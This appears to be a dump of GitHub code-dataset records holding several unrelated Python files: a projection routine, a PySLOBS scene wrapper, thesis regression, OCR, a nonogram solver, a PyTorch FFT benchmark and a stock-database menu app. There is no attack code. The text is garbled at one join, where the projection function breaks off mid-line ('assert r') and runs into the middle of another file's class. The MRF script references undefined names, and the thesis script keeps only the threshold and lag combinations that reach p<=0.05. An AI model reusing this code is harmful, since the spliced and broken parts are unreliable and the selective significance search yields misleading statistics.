1:\n                    A+=1\n                    active_sum = active_sum+z[sortOrder[A]]\n                    if z[sortOrder[A+1]] < (-theta-Delta):\n                        break\n            if DeltaC==Delta:\n                while 1:\n                    C+=1\n                    active_sum = active_sum-z[sortOrder[C]]\n                    if z[sortOrder[C+1]] < (1-theta-Delta):\n                        break\n            theta += Delta\n\n\n#@jit('void(double[:], double, double[:], double)', nopython=True, nogil=True)\ndef project_is(z, r, zProj, tol=1.0e-6):\n    '''\n    Jitted code to compute the ppr projection via interpolation search.\n\n    Input: z: a vector assumed to be a numpy array\n           r: the target sum\n           tol: tolerance for the search\n\n    Returns: zProj projected onto the set\n    '''\n    n = len(z)\n\n    # compute minimum and maximum values of the input\n    maxval = z[0]\n    minval = z[0]\n    for i in range(n):\n        if z[i]>maxval:\n            maxval = z[i]\n        elif z[i]<minval:\n            minval = z[i]\n\n    # rescaling of extreme inputs (reconstructed; left disabled as in the original)\n    # extreme = max(abs(maxval),abs(minval))\n    # if extreme > 1e+9:\n    #     for i in range(n):\n    #         z[i] = 100*z[i]/extreme\n    #     maxval = 100*maxval/extreme\n    #     minval = 100*minval/extreme\n\n    # set incredibly conservative upper and lower bounds for theta\n    L = -maxval\n    U = 1-minval\n\n    valU = 1.0*n\n    valL = 0.0\n    j = 0\n    while 1:\n        # interpolation search:\n        theta = L + ((r - valL)/ (valU - valL))*(U - L)\n\n        cur_sum = 0.0\n        for i in range(n):\n            zProj[i] = max(min(z[i]+theta,1.0),0.0)\n            cur_sum += zProj[i]\n\n        # convergence test (reconstructed): stop once the sum is within tol of r\n        if abs(cur_sum-r)<tol:\n            break\n        if cur_sum>r:\n            U = theta\n            valU = cur_sum\n        else:\n            L = theta\n            valL = cur_sum\n        j = j + 1\n        if j>10000:\n            raise ArithmeticError('no projection convergence')\n\ndef project(z, r, alg='is'):\n    '''\n    Computes a projection onto the subset of the hypercube that sums to r\n    using the algorithms described in Barman, Liu, Draper, and Recht, 2011\n    or by using interpolation search\n\n    Input: z: a vector assumed to be a numpy array\n           r: the target sum\n           alg: desired algorithm to run (must be 'kkt' or 'is')\n\n    Returns: zProj projected onto the set\n    '''\n\n    n = len(z)\n    assert r SceneNode:\n        response = await self._connection.command(\n            \"addFile\", self._prepared_params([str(path), folder_id])\n        )\n        return scenenode_factory(self._connection, response)\n\n    async def add_source(\n        self, source_id: str, options: Optional[ISceneNodeAddOptions] = None\n    ) -> SceneNode:\n        options_dict = {}\n        if options:\n            if options.id is not None:\n                options_dict[\"id\"] = options.id\n            if options.source_add_options is not None:\n                source_add_options = {}\n                if options.source_add_options.channel is not None:\n                    source_add_options[\"channel\"] = options.source_add_options.channel\n                if 
options.source_add_options.is_temporary is not None:\n                    source_add_options[\n                        \"isTemporary\"\n                    ] = options.source_add_options.is_temporary\n                options_dict[\"sourceAddOptions\"] = source_add_options\n        response = await self._connection.command(\n            \"addSource\", self._prepared_params([source_id, options_dict])\n        )\n        return sceneitem_factory(self._connection, response)\n\n    async def can_add_source(self, source_id: str) -> bool:\n        response = await self._connection.command(\n            \"canAddSource\", self._prepared_params([source_id])\n        )\n        return response\n\n    async def clear(self):\n        response = await self._connection.command(\"clear\", self._prepared_params())\n        self._check_empty(response)\n\n    async def create_and_add_source(\n        self, name: str, type_: TSourceType, settings: Optional[dict[Any]] = None\n    ): # -> SceneItem:\n        response = await self._connection.command(\n            \"createAndAddSource\", self._prepared_params([name, type_, settings])\n        )\n        return sceneitem_factory(self._connection, response)\n\n    async def create_folder(self, name: str): # -> SceneItem:\n        response = await self._connection.command(\n            \"createFolder\", self._prepared_params([name])\n        )\n        return sceneitemfolder_factory(self._connection, response)\n\n    async def get_folder(self, scene_folder_id: str): # -> SceneItemFolder:\n        response = await self._connection.command(\n            \"getFolder\", self._prepared_params([scene_folder_id])\n        )\n        return sceneitemfolder_factory(self._connection, response)\n\n    async def get_folders(self): # -> list[SceneItemFolder]:\n        response = await self._connection.command(\"getFolders\", self._prepared_params())\n        return [\n            sceneitemfolder_factory(self._connection, subitem) for subitem in response\n        ]\n\n    async def get_item(self, scene_folder_id: str): # -> Optional[SceneItem]:\n        response = await self._connection.command(\n            \"getItem\", self._prepared_params([scene_folder_id])\n        )\n        return sceneitem_factory(self._connection, response) if response else None\n\n    async def get_items(self): # -> list[SceneItem]:\n        response = await self._connection.command(\"getItems\", self._prepared_params())\n        return [sceneitem_factory(self._connection, subitem) for subitem in response]\n\n    async def get_model(self):\n        response = await self._connection.command(\"getModel\", self._prepared_params())\n        return scene_factory(self._connection, response)\n\n    async def get_nested_items(self): # -> Source\n        response = await self._connection.command(\n            \"getNestedItems\", self._prepared_params()\n        )\n        return [sceneitem_factory(self._connection, source) for source in response]\n\n    async def get_nested_scenes(self): # -> Source\n        response = await self._connection.command(\n            \"getNestedScenes\", self._prepared_params()\n        )\n        return [scene_factory(self._connection, source) for source in response]\n\n    async def get_nested_sources(self): # -> Source\n        response = await self._connection.command(\n            \"getNestedSources\", self._prepared_params()\n        )\n        return [source_factory(self._connection, source) for source in response]\n\n    async def get_node(self, scene_node_id): # -> Source\n        response = await self._connection.command(\n            \"getNode\", self._prepared_params([scene_node_id])\n        )\n        return scenenode_factory(self._connection, response)\n\n    async def get_node_by_name(self, name: str) -> Optional[Source]:\n        response = await self._connection.command(\n            \"getNodeByName\", self._prepared_params([name])\n        )\n        if not response:\n            return None\n        else:\n            return scenenode_factory(self._connection, response)\n\n    async def get_nodes(self): # -> Source\n        response = await 
self._connection.command(\"getNodes\", self._prepared_params())\n result = [scenenode_factory(self._connection, source) for source in response]\n # Update attributes as a side-effect\n self._nodes = result\n return result\n\n async def get_root_nodes(self):\n response = await self._connection.command(\n \"getRootNodes\", self._prepared_params()\n )\n return [scenenode_factory(self._connection, node) for node in response]\n\n async def get_selection(self, ids: Optional[list[str]] = None):\n response = await self._connection.command(\n \"getSelection\", self._prepared_params(ids)\n )\n return selection_factory(self._connection, response)\n\n async def get_source(self):\n response = await self._connection.command(\"getSource\", self._prepared_params())\n return source_factory(self._connection, response)\n\n async def make_active(self):\n response = await self._connection.command(\"makeActive\", self._prepared_params())\n self._check_empty(response)\n\n async def remove(self):\n response = await self._connection.command(\"remove\", self._prepared_params())\n self._check_empty(response)\n\n async def remove_folder(self, folder_id):\n response = await self._connection.command(\n \"removeFolder\", self._prepared_params([folder_id])\n )\n self._check_empty(response)\n\n async def remove_item(self, scene_item_id):\n response = await self._connection.command(\n \"removeItem\", self._prepared_params([scene_item_id])\n )\n self._check_empty(response)\n\n async def set_name(self, new_name):\n response = await self._connection.command(\n \"setName\", self._prepared_params([new_name])\n )\n self._check_empty(response)\n\n # Update local cache.\n self._name = new_name\n\n\nregister(Scene)\n","repo_name":"Julian-O/PySLOBS","sub_path":"pyslobs/slobs/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":7838,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"7582251019","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport statsmodels.formula.api as smf\n\ndf = pd.read_csv('r_data.csv')\n\nbase = -1\nmeans = {}\nstart = -0.27 #Set start\nstop = -0.15 #Set stop\nps = []\nrs = []\nbases = []\nroofs = []\nks = []\n\nps_2 = []\nrs_2 = []\nbases_2 = []\nroofs_2 = []\nks_2 = []\n\nps_3 = []\nrs_3 = []\nbases_3 = []\nroofs_3 = []\nks_3 = []\nfor i in range(0, 100):\n base = start + i * 0.0006\n for j in range(0, 100):\n roof = stop - (j * 0.0006)\n df_j = df[df['Autocorrelation'] >= base]\n df_j_2 = df_j[df_j['Autocorrelation'] <= roof] \n\n for k in range(0, 5):\n df_j_2_shifted = df_j_2.copy()\n try:\n df_j_2_shifted['MKT'] = df_j_2_shifted.MKT.shift(k)\n df_j_2_shifted['SMB'] = df_j_2_shifted.SMB.shift(k)\n df_j_2_shifted['HML'] = df_j_2_shifted.HML.shift(k)\n df_j_2_shifted = df_j_2_shifted.dropna(how='any', axis=0)\n except ValueError:\n break\n\n reg = 'HML~Autocorrelation'\n reg2 = 'SMB~Autocorrelation'\n reg3 = 'MKT~Autocorrelation'\n\n try:\n reg_res = smf.ols(reg, df_j_2_shifted).fit()\n reg_res2 = smf.ols(reg2, df_j_2_shifted).fit()\n reg_res3 = smf.ols(reg3, df_j_2_shifted).fit()\n p_value = reg_res.pvalues[1]\n p_value2 = reg_res2.pvalues[1]\n p_value3 = reg_res3.pvalues[1]\n r_value = reg_res.rsquared\n r_value_2 = reg_res2.rsquared\n r_value_3 = reg_res3.rsquared\n\n if p_value <= 0.05:\n ps.append(p_value)\n bases.append(base)\n roofs.append(roof)\n ks.append(k)\n rs.append(r_value)\n if p_value2 <= 0.05:\n ps_2.append(p_value2)\n bases_2.append(base)\n roofs_2.append(roof)\n 
ks_2.append(k)\n rs_2.append(r_value_2)\n if p_value3 <= 0.05:\n ps_3.append(p_value3)\n bases_3.append(base)\n roofs_3.append(roof)\n ks_3.append(k)\n rs_3.append(r_value_3)\n\n except ValueError:\n break\n\nres_hml = pd.DataFrame(list(zip(bases, roofs, ks, rs)), columns=['Base', 'Roof', 'Lag', 'Rsq'])\nres_smb = pd.DataFrame(list(zip(bases_2, roofs_2, ks_2, rs_2)), columns=['Base', 'Roof', 'Lag', 'Rsq'])\nres_mkt = pd.DataFrame(list(zip(bases_3, roofs_3, ks_3, rs_3)), columns=['Base', 'Roof', 'Lag', 'Rsq'])\n\nres_hml.to_csv(r'res_hml_treshold_neg_1.csv')\nres_smb.to_csv(r'res_smb_treshold_neg_1.csv')\nres_mkt.to_csv(r'res_mkt_treshold_neg_1.csv')","repo_name":"fl0wZyy/honors_thesis_code","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39667683409","text":"import pytesseract\nfrom PIL import Image\n\nimg = Image.open('') # relative path to image\npytesseract.pytesseract.tesseract_cmd = r''\n\ncustom_config = r'--oem 3 --psm 6'\n\ntext = pytesseract.image_to_string(img, config=custom_config)\n\nwith open('', 'w') as text_file: # text file for text from picture\n text_file.write(text)\n","repo_name":"vvv2006v/image-text-recognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16584658812","text":"from scipy.fftpack import fft\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pylab import*\nfrom scipy.io import wavfile\n\ny = [683, 766, 812, 912, 1024, 1085, 1230]\n\nx = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\"]\nplt.plot(y)\n\nylabel('Frequency')\nxlabel(x[0]+\" \"+\n x[1]+\" \"+\n x[2]+\" \"+\n x[3]+\" \"+\n x[4]+\" \"+\n x[5]+\" \"+\n x[6]+\" \")\n\nplt.grid()\nplt.show()\n","repo_name":"GBortoto/Unknown","sub_path":"Plot - Notas.py","file_name":"Plot - Notas.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7336261372","text":"hints = [1,5,1]\na = [0,0,0,0,0,0,0,0,0,0]\nb = [0,1,0,0,0,0,0,0,0,0]\nc = [0,1,0,1,1,1,1,1,0,0]\nd = [0,1,0,1,1,1,1,1,0,1]\ne = [1,0,1,1,1,1,1,0,1,0]\n\ndef space():\n return [0 for i in range(20)]\n \nhints_2 = [6,6,6]\n\ndef len_hints(arr):\n return sum(arr) + len(arr) - 1\n \ndef how_many_counted(arr):\n seen = False\n blanks = 0\n for el in arr:\n if el == 0:\n if not seen:\n blanks += 1\n else:\n if not seen:\n blanks += 1\n seen = True\n # print('returning blanks:',blanks)\n return blanks\n \ndef usable_space(space):\n res = []\n space_sum = sum(space)\n if space_sum == 0:\n return space, space_sum\n i = len(space) - 1\n while i in range(len(space)):\n if space[i] == 1:\n i += 1\n break\n i -= 1\n if i >= 0:\n i += 1\n space_sum += how_many_counted(space[:i + 1])\n # print('returning i:',i)\n # print(space[i:])\n return space[i:], space_sum\n \n \ndef calc_diff(arr, space, index):\n length = len(arr)\n if length <= index:\n # print('already finished!')\n return -1\n print('fitting ' + str(arr) + ' into ' + str(space) + ' starting at ' + str(arr[index]))\n new_space, space_to_remove = usable_space(space)\n spaces_len = len(new_space)\n v = (sum(arr[:index]))\n # print('v',v)\n covered_space = sum(space)\n to_be_covered = sum(arr)\n space_left_to_cover = len_hints(arr[index:])\n arr_len = space_left_to_cover\n if covered_space == to_be_covered:\n 
# print('base')\n return -1\n # print('new_space',new_space)\n # print('space_to_remove',space_to_remove)\n # print('spaces_len',spaces_len)\n # print('arr_len',arr_len)\n return spaces_len - arr_len\n \ndef calc_buffer_size(arr, space, index):\n pass\n\nhints_length = len_hints(hints)\n# print(hints_length)\n\nprint('a_diff:', calc_diff(hints, a, 0) == 1)\n# print('\\n')\nprint('b_diff:', calc_diff(hints, b, 1) == 0)\n# print('\\n')\nprint('c_diff:', calc_diff(hints, c, 2) == 0)\n# print('\\n')\nprint('d_diff:', calc_diff(hints, d, 2) == -1)\n# print('\\n')\nprint('e_diff:', calc_diff(hints, e, 3) == -1)\n# print('\\n')\nprint('large_diff:', calc_diff(hints_2, space(), 0) == 0)\n# print('\\n')\nprint('large_diff:', calc_diff([18], space(), 0) == 2)\n# print('\\n')\nprint('large_diff:', calc_diff([5,5,5], space(), 0) == 3)\n# print('\\n')\n\nten_ones = [1 for i in range(10)]\nprint('large_diff:', calc_diff([10,4,4], (ten_ones + space()[:-10]), 1) == 0)\n\ndef fill_row(row, hints, index, buff):\n hint = hints[index]\n new_row = row#.copy()\n left_hints = hints[:index]\n right_hints = hints[index:]\n left_space = len_hints(left_hints) + 1\n right_space = len_hints(right_hints)\n left_puzzle_sum = sum(row[:left_space])\n if left_puzzle_sum == 0:\n buff -= left_space\n # right_puzzle_sum = sum(row[right_space:])\n # print('left_hints:',left_hints,' right_hints:',right_hints,' left_space:',left_space,' right_space:', right_space,' buff:',buff)\n i = 0\n while i in range(len(new_row)):\n #print(new_row[i])\n left = left_space + buff\n right = (len(new_row) - (right_space + buff)) + hint\n # print('left:',left,' right',right)\n if hint > 0 and hint > buff:\n if i >= left and i < right: # or ((i) == left == right == buff):\n new_row[i] = 1\n i += 1\n # print('new_row:',new_row)\n return new_row\n\ndef horizontal_row_fill(puzzle_row, hints):\n i = 0\n temp_row = puzzle_row.copy()\n while i in range(len(hints)):\n buffer_space = calc_diff(hints, puzzle_row, i)\n # print('buffer_space:',buffer_space)\n temp_row = fill_row(puzzle_row, hints, i, buffer_space)\n \n i += 1\n # if i == len(hints):\n # return temp_row\n return temp_row\n \ndef ten_space():\n return [0 for i in range(10)]\nprint()\nprint(horizontal_row_fill(space(), hints_2) == [1,1,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,1,1,1])\nprint(horizontal_row_fill(space(), [5,5,5]) == [0,0,0,1,1,0,0,0,0,1,1,0,0,0,0,1,1,0,0,0])\nprint(horizontal_row_fill(space(), [18]) == [0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0])\nprint(horizontal_row_fill(ten_space(), hints) == [0,0,0,1,1,1,1,0,0,0])\nprint(horizontal_row_fill(ten_space(), [1]) == ten_space())\nprint(horizontal_row_fill(ten_space(), [6]) == [0,0,0,0,1,1,0,0,0,0])\nprint(horizontal_row_fill(ten_space(), [4,5]) == [1,1,1,1,0,1,1,1,1,1])\nprint(horizontal_row_fill(ten_space(), [7]) == [0,0,0,1,1,1,1,0,0,0])\n\nsample_smiley = [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0],\n [0, 1, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 1, 0],\n [0, 1, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 1, 0],\n [0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],\n [0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0],\n [0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0],\n [0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0]]\nsample_smiley_h_hints = [[0],[11],[1,1],[1,3,3,1],[1,3,3,1],[1,1],[1,9,1],[1,7,1],[2,2],[11]]\n \ncount_index = 0\nnew_puzzle = [[0 for i in 
range(17)] for j in range(len(sample_smiley_h_hints))]\nwhile count_index in range(len(sample_smiley_h_hints)):\n new_puzzle[count_index] = horizontal_row_fill(new_puzzle[count_index], sample_smiley_h_hints[count_index])\n count_index += 1\nprint(new_puzzle)\n\ndef printA(arr):\n for row in arr:\n print(row)\nprintA(new_puzzle)\n \n ","repo_name":"abriggs914/Pygames","sub_path":"Pixel Puzzle Solver/Mark1/horizontal_hint_solver.py","file_name":"horizontal_hint_solver.py","file_ext":"py","file_size_in_byte":5730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14833931679","text":"\"\"\"Microbenchmarks for the torch.fft module\"\"\"\nfrom argparse import ArgumentParser\nfrom collections import namedtuple\nfrom collections.abc import Iterable\n\nimport torch\nimport torch.fft\nfrom torch.utils import benchmark\nfrom torch.utils.benchmark.op_fuzzers.spectral import SpectralOpFuzzer\n\n\ndef _dim_options(ndim):\n if ndim == 1:\n return [None]\n elif ndim == 2:\n return [0, 1, None]\n elif ndim == 3:\n return [0, 1, 2, (0, 1), (0, 2), None]\n raise ValueError(f\"Expected ndim in range 1-3, got {ndim}\")\n\n\ndef run_benchmark(name: str, function: object, dtype: torch.dtype, seed: int, device: str, samples: int,\n probability_regular: float):\n cuda = device == 'cuda'\n spectral_fuzzer = SpectralOpFuzzer(seed=seed, dtype=dtype, cuda=cuda,\n probability_regular=probability_regular)\n results = []\n for tensors, tensor_params, params in spectral_fuzzer.take(samples):\n shape = [params['k0'], params['k1'], params['k2']][:params['ndim']]\n str_shape = ' x '.join([f\"{s:<4}\" for s in shape])\n sub_label = f\"{str_shape} {'' if tensor_params['x']['is_contiguous'] else '(discontiguous)'}\"\n for dim in _dim_options(params['ndim']):\n for nthreads in (1, 4, 16) if not cuda else (1,):\n measurement = benchmark.Timer(\n stmt='func(x, dim=dim)',\n globals={'func': function, 'x': tensors['x'], 'dim': dim},\n label=f\"{name}_{device}\",\n sub_label=sub_label,\n description=f\"dim={dim}\",\n num_threads=nthreads,\n ).blocked_autorange(min_run_time=1)\n measurement.metadata = {\n 'name': name,\n 'device': device,\n 'dim': dim,\n 'shape': shape,\n }\n measurement.metadata.update(tensor_params['x'])\n results.append(measurement)\n return results\n\n\nBenchmark = namedtuple('Benchmark', ['name', 'function', 'dtype'])\nBENCHMARKS = [\n Benchmark('fft_real', torch.fft.fftn, torch.float32),\n Benchmark('fft_complex', torch.fft.fftn, torch.complex64),\n Benchmark('ifft', torch.fft.ifftn, torch.complex64),\n Benchmark('rfft', torch.fft.rfftn, torch.float32),\n Benchmark('irfft', torch.fft.irfftn, torch.complex64),\n]\nBENCHMARK_MAP = {b.name: b for b in BENCHMARKS}\nBENCHMARK_NAMES = [b.name for b in BENCHMARKS]\nDEVICE_NAMES = ['cpu', 'cuda']\n\ndef _output_csv(file, results):\n file.write('benchmark,device,num_threads,numel,shape,contiguous,dim,mean (us),median (us),iqr (us)\\n')\n for measurement in results:\n metadata = measurement.metadata\n device, dim, shape, name, numel, contiguous = (\n metadata['device'], metadata['dim'], metadata['shape'],\n metadata['name'], metadata['numel'], metadata['is_contiguous'])\n\n if isinstance(dim, Iterable):\n dim_str = '-'.join(str(d) for d in dim)\n else:\n dim_str = str(dim)\n shape_str = 'x'.join(str(s) for s in shape)\n\n print(name, device, measurement.task_spec.num_threads, numel, shape_str, contiguous, dim_str,\n measurement.mean * 1e6, measurement.median * 1e6, measurement.iqr * 1e6,\n sep=',', 
file=file)\n\n\nif __name__ == '__main__':\n    parser = ArgumentParser(description=__doc__)\n    parser.add_argument('--device', type=str, choices=DEVICE_NAMES, nargs='+', default=DEVICE_NAMES)\n    parser.add_argument('--bench', type=str, choices=BENCHMARK_NAMES, nargs='+', default=BENCHMARK_NAMES)\n    parser.add_argument('--seed', type=int, default=0)\n    parser.add_argument('--samples', type=int, default=10)\n    parser.add_argument('--probability-regular', '--probability_regular', type=float, default=1.0)\n    parser.add_argument('-o', '--output', type=str)\n    args = parser.parse_args()\n\n    num_benchmarks = len(args.device) * len(args.bench)\n    i = 0\n    results = []\n    for device in args.device:\n        for bench in (BENCHMARK_MAP[b] for b in args.bench):\n            results += run_benchmark(\n                name=bench.name, function=bench.function, dtype=bench.dtype,\n                seed=args.seed, device=device, samples=args.samples,\n                probability_regular=args.probability_regular)\n            i += 1\n            print(f'Completed {bench.name} benchmark on {device} ({i} of {num_benchmarks})')\n\n    if args.output is not None:\n        with open(args.output, 'w') as f:\n            _output_csv(f, results)\n\n    compare = benchmark.Compare(results)\n    compare.trim_significant_figures()\n    compare.colorize()\n    compare.print()\n","repo_name":"pytorch/pytorch","sub_path":"torch/utils/benchmark/examples/spectral_ops_fuzz_test.py","file_name":"spectral_ops_fuzz_test.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"10423813779","text":"from DbConnection import DbConnection\nimport pandas as pd\nimport matplotlib.pyplot as plot\n\n\nclass Trader:\n    def __init__(self):\n        self.__str__ = \"Trader\"\n        self.email = \"\"\n        self.company = \"\"\n        self.db = DbConnection('market', 'stocks') # create database connection object\n        self.menu_options = [x for x in dir(self) if x.startswith(\"m_\")] # create options menu for user using class attributes\n\n        while True:\n            self._menu()\n            # get input from user prompt and call the appropriate function name\n            try:\n                option_num = int(input(\"Enter option number and press ENTER, or 0 to quit: \"))\n                if option_num == 0:\n                    print(\"Good bye!\")\n                    return\n                try:\n                    func = getattr(self, self.menu[option_num])\n                    print(func())\n                except AttributeError:\n                    print(\"Unable to retrieve function name %s from menu option\" % self.menu[option_num])\n            except (ValueError, KeyError): # non-numeric input or number not on the menu\n                print(\"Invalid option\")\n\n    def _menu(self):\n        print(\"\\nMenu\\n====\")\n        self.menu = {}\n        menu_item_number = 1\n        for item in self.menu_options:\n            self.menu[menu_item_number] = item\n            menu_item_number += 1\n        for option_num, option_name in self.menu.items():\n            print(\"%s. 
%s\" % (option_num, option_name))\n\n def m_get_industry_tickers(self):\n \"\"\"Get Industry tickers\"\"\"\n industry = input(\"Enter name of industry and press ENTER: \")\n return self.db.get_industry_tickers(industry)\n\n def m_get_countries(self):\n \"\"\"Get list of countries\"\"\"\n countries = self.db.get_countries()\n print(\"\\nCountries\\n=======\")\n for country in countries:\n print(country)\n\n def m_get_sectors(self):\n \"\"\"Get list of sectors\"\"\"\n sectors = self.db.get_sectors()\n print(\"\\nSectors\\n=======\")\n for sector in sectors:\n print(sector)\n\n def m_get_industries(self):\n \"\"\"Get list of industries\"\"\"\n industries = self.db.get_industries()\n print(\"\\nIndustries\\n=======\")\n for industry in industries:\n print(industry)\n\n def m_get_50_day_simple_moving_avg_count(self):\n \"\"\"Get 50 day simple moving average count\"\"\"\n low = input(\"Enter lower threshold value for 50 day average count and press ENTER: \")\n high = input(\"Enter high threshold value for 50 day average count and press ENTER: \")\n return self.db.get_50_day_simple_moving_avg_count(low, high)\n\n def m_get_total_outstanding_shares_by_sector(self):\n \"\"\"Get total outstanding shares by sector\"\"\"\n sector = input(\"Enter name of sector and press ENTER: \")\n return self.db.get_total_outstanding_shares_by_sector(sector)\n\n def m_get_analyst_recommendation_score(self): # new function\n \"\"\"Get tickers recommended by analysts where score greater than low\"\"\"\n ticker = input(\"Enter name of ticker and press ENTER: \")\n return self.db.get_analyst_recommendation_score(ticker)\n\n def m_plot_stock_price_by_sector_by_country(self):\n \"\"\"Generate box plot for stock prices by sector by country\"\"\"\n sector = input(\"Enter name of sector and press ENTER: \")\n country = input(\"Enter name of country and press ENTER: \")\n dataset = self.db.get_stock_price_by_sector_by_country(sector, country)\n data_frame = pd.DataFrame(dataset, columns=['Price', 'Ticker'])\n try:\n data_frame.plot.bar(x='Ticker', y='Price', rot=90, title=\"Stock prices for %s sector in %s\" % (sector, country))\n plot.show(block=True)\n except TypeError:\n print(\"No data to plot\")\n\n def m_plot_stock_price_by_industry_by_country(self):\n \"\"\"Generate box plot for stock prices by industry by country\"\"\"\n industry = input(\"Enter name of industry and press ENTER: \")\n country = input(\"Enter name of country and press ENTER: \")\n dataset = self.db.get_stock_price_by_industry_by_country(industry, country)\n data_frame = pd.DataFrame(dataset, columns=['Price', 'Ticker'])\n try:\n data_frame.plot.bar(x='Ticker', y='Price', rot=90,\n title=\"Stock prices for %s industry in %s\" % (industry, country))\n plot.show(block=True)\n except TypeError:\n print(\"No data to plot\")\n\n def m_plot_stock_recommendation_score_by_sector_by_country(self):\n \"\"\"Generate box plot for stock recommendation scores by sector by country\"\"\"\n sector = input(\"Enter name of sector and press ENTER: \")\n country = input(\"Enter name of country and press ENTER: \")\n dataset = self.db.get_stock_recommendation_score_by_sector_by_country(sector, country)\n data_frame = pd.DataFrame(dataset, columns=['Analyst Recom', 'Ticker'])\n try:\n data_frame.plot.bar(x='Ticker', y='Analyst Recom', rot=90, title=\"Analyst recommendation scores for %s sector in %s\" % (sector, country))\n plot.show(block=True)\n except TypeError:\n print(\"No Data to plot\")\n\n def m_plot_stock_recommendation_score_by_industry_by_country(self):\n 
\"\"\"Generate box plot for stock recommendation scores by sector by country\"\"\"\n industry = input(\"Enter name of industry and press ENTER: \")\n country = input(\"Enter name of country and press ENTER: \")\n dataset = self.db.get_stock_recommendation_score_by_industry_by_country(industry, country)\n data_frame = pd.DataFrame(dataset, columns=['Analyst Recom', 'Ticker'])\n try:\n data_frame.plot.bar(x='Ticker', y='Analyst Recom', rot=90,\n title=\"Analyst recommendation scores for %s industry in %s\" % (industry, country))\n plot.show(block=True)\n except TypeError:\n print(\"No Data to plot\")\n\n\nclass Manager(Trader):\n def __init__(self):\n super().__init__()\n self.__str__ = \"Hedge Fund Manager\"\n \n\n def m_create_document(self):\n \"\"\"Create document\"\"\"\n document = input(\"Enter Document in key, value pair format and press ENTER: \")\n return self.db.create_document(document)\n\n def m_update_volume(self):\n \"\"\"Update ticker volume\"\"\"\n ticker = input(\"Enter ticker symbol and press ENTER: \")\n volume = input(\"Enter volume for ticker and press ENTER: \")\n return self.db.update_volume(ticker, volume)\n\n \n \n \n\n def m_delete_document(self):\n \"\"\"Delete document\"\"\"\n ticker = input(\"Enter ticker symbol and press ENTER: \")\n return self.db.delete_document(ticker)\n\n def m_update_analyst_recommendation_score(self):\n \"\"\"Update analyst recommendation score\"\"\"\n ticker = input(\"Enter ticker symbol and press ENTER: \")\n score = input(\"Enter new score: \")\n return self.db.update_recommendation(ticker, score)\n\n\n\n","repo_name":"felixt-snhu/felixt-snhu.github.io","sub_path":"capstone_project/management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":7162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42383216883","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport h5py\nimport matplotlib.pyplot as plt\nimport ThermalImagingAnalysis as tai\nimport ActivityPatterns as ap\nimport numpy as np\nfrom sklearn.metrics import f1_score\n\npPenalty = \"Penalty_Gaussian_1024fr_2.5Hz_TruncatedWaveletBasis.mat\"\n#pData = \"sep_1072240.mat\"\npData = \"../../SEP/626510_sep.mat\"\n\nf = h5py.File(pData, \"r\")\nS = f[\"S1024\"].value\n#S = f[\"img\"].value\n#T = f[\"T\"].value\nT = f[\"T1024\"].value\n\nf_P = h5py.File(pPenalty, \"r\")\nP = f_P[\"BPdir2\"].value # learned penalty matrix\nprint('[INFO] P is being transposed\\n')\nP = P.transpose() # P appears to be stored as transposed version of itself\nB = f_P[\"B\"].value # basis matrix\n\nS2 = S[0:1024,]\nT2 = T[0:1024,]\ndel S;\ndel T;\n\nX = ap.computeGaussianActivityPattern(np.squeeze(T2)).transpose();\nZ = tai.semiparamRegressionRaw(S2,X,B,P);\n\nZ_true = groundtruthImg.flatten()\nfor i in range(len(Z_true)):\n if Z_true[i] != 0:\n Z_true[i] = 1\n else:\n Z_true[i] = 0\n\nZ_pred = numpy.zeros(len(Z_true))\nfor i in range(len(Z_pred)):\n if Z[i] >= 5.2:\n Z_pred[i] = 1\n else:\n Z_pred[i] = 0\n \nF1 = f1_score(Z_true, Z_pred, average='binary')\n\n\n\nwith h5py.File(\"result.h5\",\"w\") as f:\n d1 = f.create_dataset('Z',data=Z)\n","repo_name":"nish03/MRF-in-Neural-Imaging","sub_path":"semiparamRegression/applyModel_noMRF.py","file_name":"applyModel_noMRF.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"69889692072","text":"# Author: Christian Brodbeck \nimport fnmatch\nimport re\n\nimport numpy as 
